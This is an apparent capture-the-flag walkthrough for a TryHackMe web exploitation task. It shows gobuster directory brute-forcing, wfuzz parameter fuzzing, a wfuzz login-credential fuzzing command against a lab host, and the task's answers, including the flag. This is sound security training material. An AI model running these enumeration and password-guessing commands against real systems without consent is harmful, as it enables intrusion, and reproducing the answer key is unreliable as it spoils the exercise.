search

Santa's watching

Web Exploitation - gobuster ; wfuzz

hashtag
Video

hashtag
Resources

gobuster recommended wordlist to use: big.txtarrow-up-right

hashtag
Challenge

gobuster dir -u http://example.com -w wordlist.txt -x php,txt,html

Recommend wordlist https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/big.txt

wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt localhost:80/FUZZ/note.txt

wfuzz -c -z file,mywordlist.txt -d “username=FUZZ&password=FUZZ” -u http://shibes.thm/login.php

Recommended wordlist https://assets.tryhackme.com/additional/cmn-aoc2020/day-4/wordlist

hashtag
Deploy your AttackBox

circle-check

No answer needed

hashtag
Given the URL "http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the "breed" parameter using the wordlist "big.txt" (assume that "big.txt" is in your current directory)

Note: For legal reasons, do not actually run this command as the site in question has not consented to being fuzzed!

circle-check

wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ

hashtag
Use GoBuster (against the target you deployed -- not the shibes.xyz domain) to find the API directory. What file is there?

wget https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/big.txt

gobuster dir -u http://10.10.136.48/ -w big.txt -x php

circle-check

site-log.php

hashtag
Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?

wfuzz -v -c -z file,wordlist -u http://10.10.136.48/api/site-log.php?date=FUZZ

curl http://10.10.136.48/api/site-log.php?date=20201125

circle-check

THM{D4t3_AP1}

PreviousChristmas ChaosNextSomeone stole Santa's gift list!

Last updated